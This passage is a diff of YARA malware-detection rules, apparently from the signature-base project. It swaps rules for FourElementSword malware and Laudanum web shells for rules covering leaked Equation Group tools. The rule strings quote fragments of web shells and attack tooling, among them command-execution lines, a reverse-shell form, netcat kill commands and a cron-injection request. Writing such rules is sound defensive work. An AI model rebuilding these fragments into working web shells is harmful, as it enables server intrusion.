-		logic_hash = "d5fcb2bacfa0a1f78bfbd3fa7ba3084da9a60f1b8b7880c83d8f225312c179b4"
+		logic_hash = "c27815333e05d318bc32d01e755386bc1d1dbfd9f2b92a460fbd0f703e9ba210"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
 
 	strings:
-		$s1 = "Elevate.dll" fullword ascii
-		$s2 = "GetSomeF" fullword ascii
-		$s3 = "GetNativeSystemInfo" fullword ascii
+		$x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
+		$x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
+		$x3 = " -i                do not autokill after 5 hours" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
+		( filesize < 9KB and 1 of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Fslapi_Dll_Gui : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursezinger_Linuxrh7_3_V_2_0_0 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1cc73eaf-7463-5070-97e5-6ea4c7735371"
-		date = "2016-04-18"
+		id = "d4cab478-da1e-54ef-995a-897d1813619e"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L106-L121"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1205-L1221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
-		logic_hash = "909b187f864a240268d0ffcef904b85cd1eaad97dd3a3a808aad58968fbb76c2"
+		logic_hash = "fa56fe4dd44d266741a3f0b0edfc24660b260c1ade45c23171f22bc43a3bee75"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
 
 	strings:
-		$s1 = "fslapi.dll.gui" fullword wide
-		$s2 = "ImmGetDefaultIMEWnd" fullword ascii
-		$s3 = "RichOX" fullword ascii
+		$s1 = ",%02d%03d" fullword ascii
+		$s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$s3 = "__strtoll_internal" ascii
+		$s4 = "__strtoul_internal" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Powershell_Start
+rule SIGNATURE_BASE_Equationgroup_Seconddate_Implantstandalone_3_0_3 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62affc03-a408-5d8f-99da-58dead8646c5"
-		date = "2016-04-18"
+		id = "08b1aa88-8731-51db-b659-96147f509bcd"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L123-L137"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1223-L1238"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b6053e784c5762fdb9931f9064ba6e52c26c2d4b09efd6ff13ca87bbb33c692"
-		logic_hash = "7b1986845d97dcd11c8baddb0b49350ad30c6fff98840275befef4ad0b906b54"
+		logic_hash = "8d56f471104bfb2ef2bf730e5a8b60c123706f12eb52226895b123b16eed2883"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
 
 	strings:
-		$s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
-		$s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
+		$s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
+		$s2 = "G8HcJ HcF LcF0LcN" fullword ascii
+		$s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Resn32Dll
+rule SIGNATURE_BASE_Equationgroup_Watcher_Solaris_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e1f6d8d-53ea-542f-ba49-39b4c86f3124"
-		date = "2016-04-18"
+		id = "e75c6ed9-b6e6-530d-a6ac-40bd0477754f"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L139-L154"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1240-L1256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f"
-		logic_hash = "9658ae3d1267993551cfb939f75f3d78de18cbeb2f524c2576b849103f3cacdc"
+		logic_hash = "61ded97e99e6bdfe2738c6d73719b3182d970aba8ea9d7cab751349669129de2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
 
 	strings:
-		$s1 = "\\Release\\BypassUAC.pdb" ascii
-		$s2 = "\\ResN32.dll" wide
-		$s3 = "Eupdate" fullword wide
+		$s1 = "getexecname" fullword ascii
+		$s2 = "invalid option `" fullword ascii
+		$s6 = "__fpstart" ascii
+		$s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Elevatedll : FILE
+rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Now : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06879d75-18a3-5d49-a963-fa4bee379387"
-		date = "2016-04-18"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L158-L179"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1258-L1272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d110bae02f00d14c5a71ecf5991e9fc38b29d8056d1e551dc36376875d2e1333"
+		logic_hash = "1d7f009c5593ac1b1517024b828b016d705b63f6812a49d909f35c34b936e6d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
-		hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
+		hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
 
 	strings:
-		$x1 = "Elevate.dll" fullword wide
-		$x2 = "ResN32.dll" fullword wide
-		$s1 = "Kingsoft\\Antivirus" fullword wide
-		$s2 = "KasperskyLab\\protected" fullword wide
-		$s3 = "Sophos" fullword wide
+		$x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
+		$x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) and all of ( $s* ) ) or ( all of them )
+		( filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_Asp_File : FILE
+rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Post : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file file.asp"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2a80d1f-f2bb-573b-b68c-71e4dfa6e1fa"
-		date = "2015-06-22"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L8-L26"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1274-L1287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
-		logic_hash = "9ec19a994571f4d1b40b6d6af3fb6eb4c5004a6439b99863b50dae0262677263"
+		logic_hash = "ffd95302df11d1ebab37817e967a1ad4d1e85e62b38a0ccd6adf0f36925e64c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
 
 	strings:
-		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
-		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
-		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii
-		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii
-		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
-		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
+		$x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 30KB and 5 of them
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Php_Killnc : FILE
+rule SIGNATURE_BASE_Equationgroup_Curseyo_Win2K_V_1_0_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file killnc.php"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "241611d3-3636-5a25-b3c3-d45d6cb81c78"
-		date = "2015-06-22"
+		id = "8161907d-d6bd-58c5-806d-387321b93b21"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L28-L45"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1289-L1306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
-		logic_hash = "431a9a66f5d0e42856ca5716c2994c018f77cc338300abd71d94ffe7e75da3bf"
+		logic_hash = "ad9bb848a0c4805a14465ff44e3c967c9afa7369536a211a8a1fb100902fbb55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
 
 	strings:
-		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
-		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
-		$s3 = "<?php echo exec('killall nc');?>" fullword ascii
-		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii
-		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
+		$s1 = "0123456789abcdefABCEDF:" fullword ascii
+		$op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f }
+		$op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d }
+		$op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 }
 
 	condition:
-		filesize < 15KB and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Asp_Shell : FILE
+rule SIGNATURE_BASE_Equationgroup_Gr : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.asp"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3ae27254-325a-5358-b5aa-ab24b43ad5a6"
-		date = "2015-06-22"
+		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L47-L66"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1308-L1322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
-		logic_hash = "af9c5cf7125e1210761e720c5f30527ac6345b5029b087807309000a29b67f6e"
+		logic_hash = "6df2a36e51fbe23e090094a91da76ca881a65d7e129c6e428ffef13787f230bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
 
 	strings:
-		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii
-		$s2 = "%ComSpec% /c dir" fullword ascii
-		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii
-		$s4 = "Server.ScriptTimeout = 180" fullword ascii
-		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii
-		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
-		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii
+		$s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
+		$s2 = "echo \"bailing. try a different name\"" fullword ascii
 
 	condition:
-		filesize < 15KB and 4 of them
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Settings : FILE
+rule SIGNATURE_BASE_Equationgroup_Curseroot_Win2K_V_2_1_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file settings.php"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "054b8723-fdfa-51dc-91ae-b915e40b2e54"
-		date = "2015-06-22"
+		id = "bd2257ef-8170-547d-9c5e-7ff03404495c"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L68-L83"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1324-L1340"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
-		logic_hash = "b02e293e659fa77257d0642c57e51d6ae712d9221ae295cf69bb845f68c650ee"
+		logic_hash = "64ea35c9287ed35b5e7fbc8aaa228f87bc003111dd6fc35f5277eeea5f371a2c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
 
 	strings:
-		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii
-		$s2 = "<li>Reverse Shell - " fullword ascii
-		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+		$op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 }
+		$op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff }
+		$op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 }
 
 	condition:
-		filesize < 13KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and 2 of ( $op* ) )
 }
-rule SIGNATURE_BASE_Asp_Proxy : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursewham_Curserazor_Cursezinger_Curseroot_Win2K : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file proxy.asp"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6193b48a-b3da-5c1e-84e8-0035d9e7ade6"
-		date = "2015-06-22"
+		id = "6a877998-7021-54cb-b068-452d005955b6"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L85-L103"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1342-L1362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
-		logic_hash = "f53c97a2bf31f411b3220dc741b85d0edf96e9b92474f1abd5ac443be6b92897"
+		logic_hash = "a5a8e6a516b51c2eed616c80a1162990c1dda4460ec7786793d66820ca15b5a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
+		hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
 
 	strings:
-		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii
-		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii
-		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
-		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii
-		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii
-		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+		$s3 = ",%02d%03d" fullword ascii
+		$s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 }
+		$op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 }
+		$op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 }
 
 	condition:
-		filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_Cfm_Shell : FILE
+rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.cfm"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5308eecf-a59f-5100-ab60-5034c5b73e7e"
-		date = "2015-06-22"
+		id = "3c5dc02b-a11a-5c61-8069-641ba90668ec"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L105-L120"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1364-L1381"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "885e1783b07c73e7d47d3283be303c9719419b92"
-		logic_hash = "961eb398422e3c528b886c150f11dcb8a6832f0ea48e20ddc381e1f2740bd0c6"
+		logic_hash = "245662b561178f4d929ed858811846b2a49dc80af25396864a3d7bd90d16ac2b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
 
 	strings:
-		$s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii
-		$s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii
-		$s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
+		$s1 = "invalid option `" fullword ascii
+		$s8 = "readdir64" fullword ascii
+		$s9 = "89:z89:%r%opw" fullword wide
+		$s13 = "Ropopoprstuvwypypop" fullword wide
+		$s17 = "Missing argument for `-x'." fullword ascii
 
 	condition:
-		filesize < 20KB and 2 of them
+		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_Aspx_Shell : FILE
+rule SIGNATURE_BASE_Equationgroup_Charm_Saver_Win2K_V_2_0_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.aspx"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4287007-79af-59fa-b8c8-3ac08d75b3bd"
-		date = "2015-06-22"
+		id = "9c2e3b70-ffa2-598a-9f99-f7a574b06c14"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L122-L138"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1383-L1399"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
-		logic_hash = "b31c36f53d46e17b6d97e582e46c540928a386e2075b841f5c11b959a0c68462"
+		logic_hash = "87cea1f46a3165485274165e840a4945d6f6a6f9ff7fd011e685e8bb90acae8a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
 
 	strings:
-		$s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii
-		$s2 = "remoteIp = Request.UserHostAddress;" fullword ascii
-		$s3 = "<form method=\"post\" name=\"shell\">" fullword ascii
-		$s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii
+		$s2 = "0123456789abcdefABCEDF:" fullword ascii
+		$op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 }
+		$op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 }
 
 	condition:
-		filesize < 20KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Php_Shell : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursehappy_Win2K_V_6_1_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file shell.php"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d3dcb16-090b-5a9f-b3d2-3822ec467f69"
-		date = "2015-06-22"
+		id = "7b75d4aa-2cbc-57fc-8fda-015bbc1fb25e"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L140-L156"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1401-L1415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
-		logic_hash = "dc798508434686bbcb4fa0bb47381252bfa0491b0987956fd4c5aa13b7f57810"
+		logic_hash = "3bf5878c3be20a7a543d4937c6d820df726062e39ee262a6c31f7e91b32fd55e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
 
 	strings:
-		$s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii
-		$s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii
-		$s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii
-		$s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii
+		$op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 }
+		$op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff }
 
 	condition:
-		filesize < 40KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Php_Reverse_Shell : FILE
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Store : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "306d150f-95a8-57fd-8f5e-786c429af6b3"
-		date = "2015-06-22"
+		id = "de6de983-fad2-58cf-95be-57109436d5fc"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L158-L173"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1417-L1433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
